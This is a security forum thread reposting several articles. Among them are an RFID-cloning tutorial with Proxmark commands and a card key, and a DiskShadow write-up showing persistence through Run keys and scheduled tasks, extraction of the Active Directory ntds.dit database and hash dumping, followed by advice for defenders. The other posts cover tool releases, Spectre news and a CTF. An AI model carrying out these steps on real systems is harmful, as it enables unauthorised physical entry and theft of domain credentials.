(reuse the readers), vibrating mini motor disc, switches and a voltage display. Reader Sound buzzer Location HID iClass R90 HID MaxiProx 5375 HID Indala ASR-620 N/A - External Tutorial This section will show you how to clone the intercepted cards from the long range readers using the Proxmark 3. iClass R90 iClass legacy cards are encrypted using a master authentication key and TDES keys. The master authentication key allows you to read and write the encrypted blocks of the card however you will require the TDES keys to encrypt or decrypt each block. You can find the master authentication key in my Proxmark 3 Cheat Sheet post & step 6 of this tutorial. The TDES keys are not publicly available, you will have to source them yourself using the Heart of Darkness paper. The R90 will read the card, decrypt it and send the Wiegand data to Wiegotcha. 1. Assemble/Power on the components and connect to the RPi Access Point Wiegotcha. 2. Navigate to http://192.168.150.1 via browser. 3. Place/Intercept a iClass Legacy card on the long range reader. 4. Copy the data from the Block 7 column into clipboard. 5. Encrypt the Block 7 data using the Proxmark 3. # Connect to the Proxmark 3 ./proxmark3 /dev/ttyACM0 # Encrypt Block 7 data hf iclass encryptblk 0000000b2aa3dd88 6. Write the encrypted Block 7 data to a writable iClass card. hf iclass writeblk b 07 d 26971075da43c659 k AFA785A7DAB33378 7. Done! if it all worked correctly, your cloned card will have the same Block 7 data as the original. You can confirm with the following: hf iclass dump k AFA785A7DAB33378 Indala ASR620 1. Assemble/Power on the components and connect to the RPi Access Point Wiegotcha. 2. Navigate to http://192.168.150.1 via browser. 3. Place/Intercept a Indala card on the long range reader. MaxiProx 5375 1. Assemble/Power on the components and connect to the RPi Access Point Wiegotcha. 2. Navigate to http://192.168.150.1 via browser. 3. Place/Intercept a ProxCard II card on the long range reader. 4. Copy the data from the Proxmark Hex column into clipboard. 5. Clone the Proxmark Hex data to a T5577 card using the Proxmark 3. # Connect to the Proxmark 3 ./proxmark3 /dev/ttyACM0 # Clone Proxmark Hex data lf hid clone 2004060a73 7. Done! if it all worked correctly, your cloned card will have the same Proxmark Hex, FC & SC data as the original. You can confirm with the following: lf search Components Most of the components can be found cheaply on eBay or your local electronics store, the most expensive components are the long range readers and the Proxmark 3. Raspberry Pi 3 Proxmark 3 RDV2 12v USB Power Bank HID iClass R90 HID Indala ASR-620 HID MaxiProx 5375 Bi-Directional Logic Level Converter DS3231 RTC Real Time Clock Vibrating Mini Motor Disc 32GB MicroSD Card JST SM 5 Pin Connectors JST SM 4 Pin Connectors References Official Proxmark 3 Repository Official Proxmark 3 Forums Mike Kelly’s Blog Wiegotcha Github Tastic RFID Thief Share this on → Sursa: https://scund00r.com/all/rfid/tutorial/2018/07/12/rfid-theif-v2.html
-
- 3
-
-
-
PEframe 5.0.1 PEframe is a open source tool to perform static analysis on Portable Executable malware and generic suspicious file. It can help malware researchers to detect packer, xor, digital signature, mutex, anti debug, anti virtual machine, suspicious sections and functions, and much more information about the suspicious files. Documentation will be available soon. Usage $ peframe <filename> Short output analysis $ peframe --json <filename> Full output analysis JSON format $ peframe --strings <filename> Strings output You can edit stringsmatch.json file to configure your fuzzer and virustotal apikey. Output example Short data example | Full data (JSON) example Install Prerequisites Python 2.7.x How to To install from PyPI: # pip install https://github.com/guelfoweb/peframe/archive/master.zip To install from source: $ git clone https://github.com/guelfoweb/peframe.git $ cd peframe # python setup.py install Sursa: https://github.com/guelfoweb/peframe
-
New Spectre variants earn $100,000 bounty from Intel Researchers discovered two new Spectre variants that can be used to bypass protections and attack systems and earned $100,000 in bug bounties from Intel. Michael Heller Senior Reporter 13 Jul 2018 Researchers found new speculative execution attacks against Intel and ARM chips, and the findings earned them a $100,000 reward under Intel's bug bounty. The new methods are themselves variations on Spectre v1 -- the bounds check bypass version of Spectre attacks -- and are being tracked as Spectre variants 1.1 and 1.2. The new Spectre 1.1 has also earned a new Common Vulnerabilities and Exposures (CVE) number, CVE-2018-3693, because it "leverages speculative stores to create speculative buffer overflows" according to Vladimir Kiriansky, a doctoral candidate in electrical engineering and computer science at MIT, and Carl Waldspurger of Carl Waldspurger Consulting. "Much like classic buffer overflows, speculative out-of-bounds stores can modify data and code pointers. Data-value attacks can bypass some Spectre v1 mitigations, either directly or by redirecting control flow. Control-flow attacks enable arbitrary speculative code execution, which can bypass fence instructions and all other software mitigations for previous speculative-execution attacks. It is easy to construct return-oriented-programming gadgets that can be used to build alternative attack payloads," Kiriansky and Waldspurger wrote in their research paper. "In a speculative data attack, an attacker can (temporarily) overwrite data used by a subsequent Spectre 1.0 gadget." Spectre 1.2 does not have a new CVE because it "relies on lazy enforcement" of read/write protections. "Spectre 1.2 [is] a minor variant of Spectre v1, which depends on lazy PTE enforcement, similar to Spectre v3," the researchers wrote. "In a Spectre 1.2 attack, speculative stores are allowed to overwrite read-only data, code pointers and code metadata, including v-tables [virtual tables], GOT/IAT [global offset table/import address table] and control-flow mitigation metadata. As a result, sandboxing that depends on hardware enforcement of read-only memory is rendered ineffective." As the research paper from Kiriansky and Waldspurger went live, Intel paid them a $100,000 bug bounty for the new Spectre variants. After the initial announcement of the Spectre and Meltdown vulnerabilities in January 2018, Intel expanded its bug bounty program to include rewards of up to $250,000 for similar side-channel attacks. I expect that more variants of Spectre and/or Meltdown will continue to be discovered in the future. Nick BilogorskiyCybersecurity strategist, Juniper Networks “When implemented properly, bug bounties help both businesses and the research community, as well as encourage more security specialists to participate in the audit and allow CISOs to optimize their security budgets for wider security coverage," Bilogorskiy wrote via email. "These bugs are new minor variants of the original Spectre variant one vulnerability and have similar impact. They exploit speculative execution and allow speculative buffer overflows. I expect that more variants of Spectre and/or Meltdown will continue to be discovered in the future." ARM and Intel did not respond to requests for comment at the time of this post. ARM did update its FAQ about speculative processor vulnerabilities to reflect the new Spectre variants. And Intel published a white paper regarding bounds check bypass vulnerabilities at the same time as the disclosure of the new Spectre variants. In it, Intel did not mention plans for a new patch but gave guidance to developers to ensure bounds checks are implemented properly in software as a way to mitigate the new issues. Advanced Micro Devices was not directly mentioned by the researchers in connection with the new Spectre variants, but Spectre v1 did affect AMD chips. AMD has not made a public statement about the new research. Sursa: https://searchsecurity.techtarget.com/news/252444914/New-Spectre-variants-earn-100000-bounty-from-Intel?utm_campaign=ssec_security&utm_medium=social&utm_source=twitter&utm_content=1531504414
-
DiskShadow: The Return of VSS Evasion, Persistence, and Active Directory Database Extraction March 26, 2018 ~ bohops [Source: blog.microsoft.com] Introduction Not long ago, I blogged about Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction. This tool was quite interesting because it was yet another utility to perform volume shadow copy operations, and it had a few other features that could potentially support other offensive use cases. In fairness, evasion and persistence are probably not the strong suits of Vshadow.exe, but some of those use cases may have more relevance in its replacement – DiskShadow.exe. In this post, we will discuss DiskShadow, present relevant features and capabilities for offensive opportunities, and highlight IOCs for defensive considerations. *Don’t mind the ridiculous title – it just seemed thematic 🙂 What is DiskShadow? “DiskShadow.exe is a tool that exposes the functionality offered by the Volume Shadow Copy Service (VSS). By default, DiskShadow uses an interactive command interpreter similar to that of DiskRaid or DiskPart. DiskShadow also includes a scriptable mode.“ – Microsoft Docs DiskShadow is included in Windows Server 2008, Windows Server 2012, and Windows Server 2016 and is a Windows signed binary. The VSS features of DiskShadow require privileged-level access (with UAC elevation), however, several command utilities can be invoked by a non-privileged user. This makes DiskShadow a very interesting candidate for command execution and evasive persistence. DiskShadow Command Execution As a feature, the interactive command interpreter and script mode support the EXEC command. As a privileged or an unprivileged user, commands and batch scripts can be invoked within Interactive Mode or via a script file. Let’s demonstrate each of these capabilities: Note: The proceeding example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail. Interactive Mode In the following example, a normal user invokes calc.exe: Script Mode In the following example, a normal user invokes calc.exe and notepad.exe by calling the script option with diskshadow.txt: diskshadow.exe /s c:\test\diskshadow.txt Like Vshadow, take note that the DiskShadow.exe is the parent process of the spawned executable. Additionally, DiskShadow will continue to run until its child processes are finished executing. Auto-Start Persistence & Evasion Since DiskShadow is a Windows signed binary, let’s take a look at a few AutoRuns implications for persistence and evasion. In the proceeding examples, we will update our script then create a RunKey and Scheduled Task. Preparation Since DiskShadow is “window forward” (e.g. pops a command window), we will need to modify our script in a way to invoke proof-of-concept pass-thru execution and close the parent DiskShadow and subsequent payloads as quickly as possible. In some cases, this technique may not be considered very stealthy if the window is opened for a lengthy period of time (which is good for defenders if this activity is noted and reported by users). However, this may be overlooked if users are conditioned to see such prompts at logon time. Note: The proceeding example is carried out under the context of a non-privileged/non-admin user account on a recently installed/updated Windows Server 2016 instance. Depending on the OS version and/or configuration, running this utility at a medium process integrity may fail. First, let’s modify our script (diskshadow.txt) to demonstrate this basic technique: EXEC "cmd.exe" /c c:\test\evil.exe *In order to support command switches, we must quote the initial binary with EXEC. This also works under Interactive Mode. Second, let’s add persistence with the following commands: - Run Key Value - reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v VSSRun /t REG_EXPAND_SZ /d "diskshadow.exe /s c:\test\diskshadow.txt" - User Level Scheduled Task - schtasks /create /sc hourly /tn VSSTask /tr "diskshadow.exe /s c:\test\diskshadow.txt" Let’s take a further look at these… AutoRuns – Run Key Value After creating the key value, we can see that our key is hidden when we open up AutoRuns and select the Logon tab. By default, Windows signed executables are hidden from view (with a few notable exceptions) as demonstrated in this screenshot: After de-selecting “Hide Windows Entries”, we can see the AutoRuns entry: AutoRuns – Scheduled Tasks Like the Run Key method, we can see that our entry is hidden in the default AutoRuns view: After de-selecting “Hide Windows Entries”, we can see AutoRuns entry: Extracting the Active Directory Database Since we are discussing the usage of a shadow copy tool, let’s move forward to showcase (yet another) VSS method for extracting the Active Directory (AD) database – ntds.dit. In the following walk-through, we will assume successful compromise of an Active Directory Domain Controller (Win2k12) and are running DiskShadow under a privileged context in Script Mode. First, let’s prepare our script. We have performed some initial recon to determine our target drive letter (for the logical drive that ‘contains’ the AD database) to shadow as well as discovered a logical drive letter that is not in use on the system. Here is the DiskShadow script (diskshadow.txt): set context persistent nowriters add volume c: alias someAlias create expose %someAlias% z: exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit delete shadows volume %someAlias% reset [Helpful Source: DataCore] In this script, we create a persistent shadow copy so that we can perform copy operations to capture the sensitive target file. By mounting a (unique) logical drive, we can guarantee a copy path for our target file, which we will extract to the ‘exfil’ directory before deleting our shadow copy identified by someAlias. *Note: We can attempt to copy out the target file by specifying a shadow device name /unique identifier. This is slightly stealthier, but it is important to ensure that labels/UUIDs are correct (via initial recon) or else the script will fail to run. This use case may be more suitable for Interactive Mode. The commands and results of the DiskShadow operation are presented in this screenshot: type c:\diskshadow.txt diskshadow.exe /s c:\diskshadow.txt dir c:\exfil In addition to the AD database, we will also need to extract the SYSTEM registry hive: reg.exe save hklm\system c:\exfil\system.bak After transferring these files from the target machine, we use SecretsDump.py to extract the NTLM Hashes: secretsdump.py -ntds ntds.dit -system system.bak LOCAL Success! We have used another method to extract the AD database and hashes. Now, let’s compare and contrast DiskShadow and Vshadow… DiskShadow vs. Vshadow DiskShadow.exe and VShadow.exe have very similar capabilities. However, there are a few differences between these applications that may justify which one is the better choice for the intended operational use case. Let’s explore some of these in greater detail: Operating System Inclusion DiskShadow.exe is included with the Windows Server operating system since 2008. Vshadow.exe is included with the Windows SDK. Unless the target machine has the Windows SDK installed, Vshadow.exe must be uploaded to the target machine. In a “living off the land” scenario, DiskShadow.exe has the clear advantage. Utility & Usage Under the context of a normal user in our test case, we can use several DiskShadow features without privilege (UAC) implications. In my previous testing, Vshadow had privilege constraints (e.g. external command execution could only be invoked after running a VSS operation). Additionally, DiskShadow is flexible with command switch support as previously described. DiskShadow.exe has the advantage here. Command Line Orientation Vshadow is “command line friendly” while DiskShadow requires use by interactive prompt or script file. Unless you have (remote) “TTY” access to a target machine, DiskShadow’s interactive prompt may not be suitable (e.g. for some backdoor shells). Additionally, there is an increased risk for detection when creating files or uploading files to a target machine. In the strict confines of this scenario, Vshadow has the advantage (although, creating a text file will likely have less impact than uploading a binary – refer to the previous section). AutoRuns Persistence & Evasion In the previous Vshadow blog post, you may recall that Vshadow is signed with the Microsoft signing certificate. This has AutoRuns implications such that it will appear within the Default View since Microsoft signed binaries are not hidden. Since DiskShadow is signed with the Windows certificate, it is hidden from the default view. In this scenario, DiskShadow has the advantage. Active Directory Database Extraction If script mode is the only option for DiskShadow usage, extracting the AD database may require additional operations if assumed defaults are not valid (e.g. Shadow Volume disk name is not what we expected). Aside from crafting and running the script, a logical drive may have to be mapped on the target machine to copy out ntds.dit. This does add an additional level of noise to the shadow copy operation. Vshadow has the advantage here. Conclusion All things considered, DiskShadow seems to be more compelling for operational use. However, that does not discount Vshadow (and other VSS methods for that matter) as a prospective tool used by threat agents. Vshadow has been used maliciously in the past for other reasons. For DiskShadow, Blue Teams and Network Defenders should consider the following: Monitor the Volume Shadow Service (VSS) for random shadow creations/deletions and any activity that involves the AD database file (ntds.dit). Monitor for suspicious instances of System Event ID 7036 (“The Volume Shadow Copy service entered the running state”) and invocation of the VSSVC.exe process. Monitor process creation events for diskshadow.exe and spawned child processes. Monitor for process integrity. If diskshadow.exe runs at a medium integrity, that is likely a red flag. Monitor for instances of diskshadow.exe on client endpoints. Unless there is a business need, diskshadow.exe *should* not be present on client Windows operating systems. Monitor for new and interesting logical drive mappings. Inspect suspicious “AutoRuns” entries. Scrutinize signed binaries and inspect script files. Enforce Application Whitelisting. Strict policies may prevent DiskShadow pass-thru applications from executing. Fight the good fight, and train your users. If they see something (e.g. a weird pop up window), they should say something! As always, if you have questions or comments, feel free to reach out to me here or on Twitter. Thank you for taking the time to read about DiskShadow! Sursa: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
-
- 1
-
-
deen An application that allows to apply encoding, compression and hashing to generic input data. It is meant to be a handy tool for quick encoding/decoding tasks for data to be used in other applications. It aims to be a lightweight alternative to other tools that might take a long time to startup and should not have too many dependencies. It includes a GUI for easy interaction and integration in common workflows as well as a CLI that might be usefule for automation tasks. Usage See the wiki for basic and more advanced usage examples. Installation Install via pip: pip3 install -r requirements.txt pip3 install . After installation, just run: deen Note: If the installation fails with an error like "Could not find a version that satisfies the requirement PyQt5", then you are trying to install deen via pip on a version of Python < 3.5. In this case, you cannot install PyQt5 via pip. You have to install PyQt5 separately, e.g. via your package manager (e.g. pacman -S python2-pyqt5 on Arch Linux for Python 2). Packages There is a deen-git package available in the Arch User Repository (AUR). Compatibility The code should be compatible with Python 2 (at least 2.7.x) and Python 3. However, deen is mainly developed for Python 3 and some features may be temporarily broken in Python 2. It is strongly recommended to use deen with Python 3. The GUI should run on most operating systems supported by Python. It was tested on Linux and Windows. Hopefully compatibility for different Python versions and operating systems will improve in the future. Feel free to test it and create issues! Some transformers will only be available in more recent versions of Python. This includes e.g. Base85 (Python 3.4 or newer) or the BLAKE2b and BLAKE2s hash algorithms (Python 3.6 or newer). Sursa: https://github.com/takeshixx/deen
-
- 1
-
-
<Registration Deadline> < !-- JUL 28 10:00 AM, 2018 -- > <Qualification> Online Jeopardy (All challenges are built on top of real world applications) JUL 28 10:00 AM ~ JUL 30 10:00 AM, 2018(GMT+8, 48 hours) <Final> Onsite Jeopardy (All challenges are built on top of real world applications) SEP 15 ~ SEP 18, 2018 (GMT+8, 48 hours) Venue: TBC, China Top 20 international teams (5 players per team) from the qualification round will be invited to participate in the on-site CTF Finals. We will see the world's best teams competing for the 2018 REAL WORLD CTF Championship. Link: https://realworldctf.com/
-
- 2
-
-
(paper) A systematic review of fuzzing techniques
Nytro replied to QuoVadis's topic in Tutoriale in engleza
Misto, de unde le scoti? -
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
NetRipper - Added support for cross-compilation on Linux - https://github.com/NytroRST/NetRipper -
[RST] NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to Nytro's topic in Proiecte RST
NetRipper - Added support for Chrome 67 (32 and 64 bits) https://github.com/NytroRST/NetRipper